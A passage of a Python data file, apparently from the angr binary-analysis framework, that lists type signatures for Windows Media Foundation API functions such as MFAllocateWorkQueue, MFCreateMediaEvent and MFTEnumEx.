'MFAddPeriodicCallback': SimTypeFunction([SimTypePointer(SimTypeFunction([SimTypeBottom(label="IUnknown")], SimTypeBottom(label="Void"), arg_names=["pContext"]), offset=0), SimTypeBottom(label="IUnknown"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Callback", "pContext", "pdwKey"]),
#
'MFRemovePeriodicCallback': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwKey"]),
#
'MFAllocateWorkQueueEx': SimTypeFunction([SimTypeInt(signed=False, label="MFASYNC_WORKQUEUE_TYPE"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["WorkQueueType", "pdwWorkQueue"]),
#
'MFAllocateWorkQueue': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pdwWorkQueue"]),
#
'MFLockWorkQueue': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueue"]),
#
'MFUnlockWorkQueue': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueue"]),
#
'MFBeginRegisterWorkQueueWithMMCSS': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueueId", "wszClass", "dwTaskId", "pDoneCallback", "pDoneState"]),
#
'MFBeginRegisterWorkQueueWithMMCSSEx': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueueId", "wszClass", "dwTaskId", "lPriority", "pDoneCallback", "pDoneState"]),
#
'MFEndRegisterWorkQueueWithMMCSS': SimTypeFunction([SimTypeBottom(label="IMFAsyncResult"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pResult", "pdwTaskId"]),
#
'MFBeginUnregisterWorkQueueWithMMCSS': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueueId", "pDoneCallback", "pDoneState"]),
#
'MFEndUnregisterWorkQueueWithMMCSS': SimTypeFunction([SimTypeBottom(label="IMFAsyncResult")], SimTypeInt(signed=True, label="Int32"), arg_names=["pResult"]),
#
'MFGetWorkQueueMMCSSClass': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueueId", "pwszClass", "pcchClass"]),
#
'MFGetWorkQueueMMCSSTaskId': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueueId", "pdwTaskId"]),
#
'MFRegisterPlatformWithMMCSS': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["wszClass", "pdwTaskId", "lPriority"]),
#
'MFUnregisterPlatformFromMMCSS': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'MFLockSharedWorkQueue': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["wszClass", "BasePriority", "pdwTaskId", "pID"]),
#
'MFGetWorkQueueMMCSSPriority': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueueId", "lPriority"]),
#
'MFCreateAsyncResult': SimTypeFunction([SimTypeBottom(label="IUnknown"), SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown"), SimTypePointer(SimTypeBottom(label="IMFAsyncResult"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["punkObject", "pCallback", "punkState", "ppAsyncResult"]),
#
'MFInvokeCallback': SimTypeFunction([SimTypeBottom(label="IMFAsyncResult")], SimTypeInt(signed=True, label="Int32"), arg_names=["pAsyncResult"]),
#
'MFCreateFile': SimTypeFunction([SimTypeInt(signed=False, label="MF_FILE_ACCESSMODE"), SimTypeInt(signed=False, label="MF_FILE_OPENMODE"), SimTypeInt(signed=False, label="MF_FILE_FLAGS"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeBottom(label="IMFByteStream"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["AccessMode", "OpenMode", "fFlags", "pwszFileURL", "ppIByteStream"]),
#
'MFCreateTempFile': SimTypeFunction([SimTypeInt(signed=False, label="MF_FILE_ACCESSMODE"), SimTypeInt(signed=False, label="MF_FILE_OPENMODE"), SimTypeInt(signed=False, label="MF_FILE_FLAGS"), SimTypePointer(SimTypeBottom(label="IMFByteStream"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["AccessMode", "OpenMode", "fFlags", "ppIByteStream"]),
#
'MFBeginCreateFile': SimTypeFunction([SimTypeInt(signed=False, label="MF_FILE_ACCESSMODE"), SimTypeInt(signed=False, label="MF_FILE_OPENMODE"), SimTypeInt(signed=False, label="MF_FILE_FLAGS"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown"), SimTypePointer(SimTypeBottom(label="IUnknown"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["AccessMode", "OpenMode", "fFlags", "pwszFilePath", "pCallback", "pState", "ppCancelCookie"]),
#
'MFEndCreateFile': SimTypeFunction([SimTypeBottom(label="IMFAsyncResult"), SimTypePointer(SimTypeBottom(label="IMFByteStream"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pResult", "ppFile"]),
#
'MFCancelCreateFile': SimTypeFunction([SimTypeBottom(label="IUnknown")], SimTypeInt(signed=True, label="Int32"), arg_names=["pCancelCookie"]),
#
'MFCreateMemoryBuffer': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["cbMaxLength", "ppBuffer"]),
#
'MFCreateMediaBufferWrapper': SimTypeFunction([SimTypeBottom(label="IMFMediaBuffer"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pBuffer", "cbOffset", "dwLength", "ppBuffer"]),
#
'MFCreateLegacyMediaBufferOnMFMediaBuffer': SimTypeFunction([SimTypeBottom(label="IMFSample"), SimTypeBottom(label="IMFMediaBuffer"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pSample", "pMFMediaBuffer", "cbOffset", "ppMediaBuffer"]),
#
'MFMapDX9FormatToDXGIFormat': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="DXGI_FORMAT"), arg_names=["dx9"]),
#
'MFMapDXGIFormatToDX9Format': SimTypeFunction([SimTypeInt(signed=False, label="DXGI_FORMAT")], SimTypeInt(signed=False, label="UInt32"), arg_names=["dx11"]),
#
'MFLockDXGIDeviceManager': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="IMFDXGIDeviceManager"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pResetToken", "ppManager"]),
#
'MFUnlockDXGIDeviceManager': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'MFCreateDXSurfaceBuffer': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypeBottom(label="IUnknown"), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["riid", "punkSurface", "fBottomUpWhenLinear", "ppBuffer"]),
#
'MFCreateWICBitmapBuffer': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypeBottom(label="IUnknown"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["riid", "punkSurface", "ppBuffer"]),
#
'MFCreateDXGISurfaceBuffer': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypeBottom(label="IUnknown"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["riid", "punkSurface", "uSubresourceIndex", "fBottomUpWhenLinear", "ppBuffer"]),
#
'MFCreateVideoSampleAllocatorEx': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["riid", "ppSampleAllocator"]),
#
'MFCreateDXGIDeviceManager': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="IMFDXGIDeviceManager"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["resetToken", "ppDeviceManager"]),
#
'MFCreateAlignedMemoryBuffer': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["cbMaxLength", "cbAligment", "ppBuffer"]),
#
'MFCreateMediaEvent': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimStruct({"Anonymous": SimUnion({"Anonymous": SimStruct({"vt": SimTypeShort(signed=False, label="UInt16"), "wReserved1": SimTypeShort(signed=False, label="UInt16"), "wReserved2": SimTypeShort(signed=False, label="UInt16"), "wReserved3": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"cVal": SimTypeBottom(label="CHAR"), "bVal": SimTypeChar(label="Byte"), "iVal": SimTypeShort(signed=True, label="Int16"), "uiVal": SimTypeShort(signed=False, label="UInt16"), "lVal": SimTypeInt(signed=True, label="Int32"), "ulVal": SimTypeInt(signed=False, label="UInt32"), "intVal": SimTypeInt(signed=True, label="Int32"), "uintVal": SimTypeInt(signed=False, label="UInt32"), "hVal": SimTypeBottom(label="LARGE_INTEGER"), "uhVal": SimTypeBottom(label="ULARGE_INTEGER"), "fltVal": SimTypeFloat(size=32), "dblVal": SimTypeFloat(size=64), "boolVal": SimTypeShort(signed=True, label="Int16"), "__OBSOLETE__VARIANT_BOOL": SimTypeShort(signed=True, label="Int16"), "scode": SimTypeInt(signed=True, label="Int32"), "cyVal": SimTypeBottom(label="CY"), "date": SimTypeFloat(size=64), "filetime": SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), "puuid": SimTypePointer(SimTypeBottom(label="Guid"), offset=0), "pclipdata": SimTypePointer(SimTypeBottom(label="CLIPDATA"), offset=0), "bstrVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "bstrblobVal": SimTypeBottom(label="BSTRBLOB"), "blob": SimTypeBottom(label="BLOB"), "pszVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "pwszVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "punkVal": SimTypeBottom(label="IUnknown"), "pdispVal": SimTypeBottom(label="IDispatch"), "pStream": 
SimTypeBottom(label="IStream"), "pStorage": SimTypeBottom(label="IStorage"), "pVersionedStream": SimTypePointer(SimStruct({"guidVersion": SimTypeBottom(label="Guid"), "pStream": SimTypeBottom(label="IStream")}, name="VERSIONEDSTREAM", pack=False, align=None), offset=0), "parray": SimTypePointer(SimTypeBottom(label="SAFEARRAY"), offset=0), "cac": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CAC", pack=False, align=None), "caub": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CAUB", pack=False, align=None), "cai": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0)}, name="CAI", pack=False, align=None), "caui": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="CAUI", pack=False, align=None), "cal": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)}, name="CAL", pack=False, align=None), "caul": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="CAUL", pack=False, align=None), "cah": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="LARGE_INTEGER"), offset=0)}, name="CAH", pack=False, align=None), "cauh": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="ULARGE_INTEGER"), offset=0)}, name="CAUH", pack=False, align=None), "caflt": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=32), offset=0)}, name="CAFLT", pack=False, align=None), "cadbl": 
SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=64), offset=0)}, name="CADBL", pack=False, align=None), "cabool": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0)}, name="CABOOL", pack=False, align=None), "cascode": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)}, name="CASCODE", pack=False, align=None), "cacy": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="CY"), offset=0)}, name="CACY", pack=False, align=None), "cadate": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=64), offset=0)}, name="CADATE", pack=False, align=None), "cafiletime": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0)}, name="CAFILETIME", pack=False, align=None), "cauuid": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="Guid"), offset=0)}, name="CACLSID", pack=False, align=None), "caclipdata": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="CLIPDATA"), offset=0)}, name="CACLIPDATA", pack=False, align=None), "cabstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)}, name="CABSTR", pack=False, align=None), "cabstrblob": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="BSTRBLOB"), offset=0)}, name="CABSTRBLOB", pack=False, align=None), "calpstr": 
SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Byte"), offset=0), offset=0)}, name="CALPSTR", pack=False, align=None), "calpwstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)}, name="CALPWSTR", pack=False, align=None), "capropvar": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="PROPVARIANT"), offset=0)}, name="CAPROPVARIANT", pack=False, align=None), "pcVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "pbVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "piVal": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0), "puiVal": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0), "plVal": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "pulVal": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), "pintVal": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "puintVal": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), "pfltVal": SimTypePointer(SimTypeFloat(size=32), offset=0), "pdblVal": SimTypePointer(SimTypeFloat(size=64), offset=0), "pboolVal": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0), "pdecVal": SimTypePointer(SimTypeBottom(label="DECIMAL"), offset=0), "pscode": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "pcyVal": SimTypePointer(SimTypeBottom(label="CY"), offset=0), "pdate": SimTypePointer(SimTypeFloat(size=64), offset=0), "pbstrVal": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "ppunkVal": SimTypePointer(SimTypeBottom(label="IUnknown"), offset=0), "ppdispVal": SimTypePointer(SimTypeBottom(label="IDispatch"), offset=0), "pparray": SimTypePointer(SimTypePointer(SimTypeBottom(label="SAFEARRAY"), offset=0), offset=0), "pvarVal": 
SimTypePointer(SimTypeBottom(label="PROPVARIANT"), offset=0)}, name="<anon>", label="None")}, name="_Anonymous_e__Struct", pack=False, align=None), "decVal": SimTypeBottom(label="DECIMAL")}, name="<anon>", label="None")}, name="PROPVARIANT", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="IMFMediaEvent"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["met", "guidExtendedType", "hrStatus", "pvValue", "ppEvent"]),
#
'MFCreateEventQueue': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFMediaEventQueue"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppMediaEventQueue"]),
#
'MFCreateSample': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFSample"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppIMFSample"]),
#
'MFCreateAttributes': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFAttributes"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["ppMFAttributes", "cInitialSize"]),
#
'MFInitAttributesFromBlob': SimTypeFunction([SimTypeBottom(label="IMFAttributes"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pAttributes", "pBuf", "cbBufSize"]),
#
'MFGetAttributesAsBlobSize': SimTypeFunction([SimTypeBottom(label="IMFAttributes"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pAttributes", "pcbBufSize"]),
#
'MFGetAttributesAsBlob': SimTypeFunction([SimTypeBottom(label="IMFAttributes"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pAttributes", "pBuf", "cbBufSize"]),
#
'MFTRegister': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypeBottom(label="Guid"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), label="LPArray", offset=0), SimTypeBottom(label="IMFAttributes")], SimTypeInt(signed=True, label="Int32"), arg_names=["clsidMFT", "guidCategory", "pszName", "Flags", "cInputTypes", "pInputTypes", "cOutputTypes", "pOutputTypes", "pAttributes"]),
#
'MFTUnregister': SimTypeFunction([SimTypeBottom(label="Guid")], SimTypeInt(signed=True, label="Int32"), arg_names=["clsidMFT"]),
#
'MFTRegisterLocal': SimTypeFunction([SimTypeBottom(label="IClassFactory"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pClassFactory", "guidCategory", "pszName", "Flags", "cInputTypes", "pInputTypes", "cOutputTypes", "pOutputTypes"]),
#
'MFTUnregisterLocal': SimTypeFunction([SimTypeBottom(label="IClassFactory")], SimTypeInt(signed=True, label="Int32"), arg_names=["pClassFactory"]),
#
'MFTRegisterLocalByCLSID': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["clisdMFT", "guidCategory", "pszName", "Flags", "cInputTypes", "pInputTypes", "cOutputTypes", "pOutputTypes"]),
#
'MFTUnregisterLocalByCLSID': SimTypeFunction([SimTypeBottom(label="Guid")], SimTypeInt(signed=True, label="Int32"), arg_names=["clsidMFT"]),
#
'MFTEnum': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), SimTypeBottom(label="IMFAttributes"), SimTypePointer(SimTypePointer(SimTypeBottom(label="Guid"), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["guidCategory", "Flags", "pInputType", "pOutputType", "pAttributes", "ppclsidMFT", "pcMFTs"]),
#
'MFTEnumEx': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="IMFActivate"), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["guidCategory", "Flags", "pInputType", "pOutputType", "pppMFTActivate", "pnumMFTActivate"]),
#
'MFTEnum2': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), SimTypeBottom(label="IMFAttributes"), SimTypePointer(SimTypePointer(SimTypeBottom(label="IMFActivate"), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["guidCategory", "Flags", "pInputType", "pOutputType", "pAttributes", "pppMFTActivate", "pnumMFTActivate"]),
#
'MFTGetInfo': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), SimTypePointer(SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="IMFAttributes"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["clsidMFT", "pszName", "ppInputTypes", "pcInputTypes", "ppOutputTypes", "pcOutputTypes", "ppAttributes"]),
#
'MFGetPluginControl': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFPluginControl"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppPluginControl"]),
#
'MFGetMFTMerit': SimTypeFunction([SimTypeBottom(label="IUnknown"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFT", "cbVerifier", "verifier", "merit"]),
#
'MFRegisterLocalSchemeHandler': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeBottom(label="IMFActivate")], SimTypeInt(signed=True, label="Int32"), arg_names=["szScheme", "pActivate"]),
#
'MFRegisterLocalByteStreamHandler': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeBottom(label="IMFActivate")], SimTypeInt(signed=True, label="Int32"), arg_names=["szFileExtension", "szMimeType", "pActivate"]),
#
'MFCreateMFByteStreamWrapper': SimTypeFunction([SimTypeBottom(label="IMFByteStream"), SimTypePointer(SimTypeBottom(label="IMFByteStream"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pStream", "ppStreamWrapper"]),
#
'MFCreateMediaExtensionActivate': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeBottom(label="IUnknown"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["szActivatableClassId", "pConfiguration", "riid", "ppvObject"]),
#
'MFCreateMuxStreamAttributes': SimTypeFunction([SimTypeBottom(label="IMFCollection"), SimTypePointer(SimTypeBottom(label="IMFAttributes"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pAttributesToMux", "ppMuxAttribs"]),
#
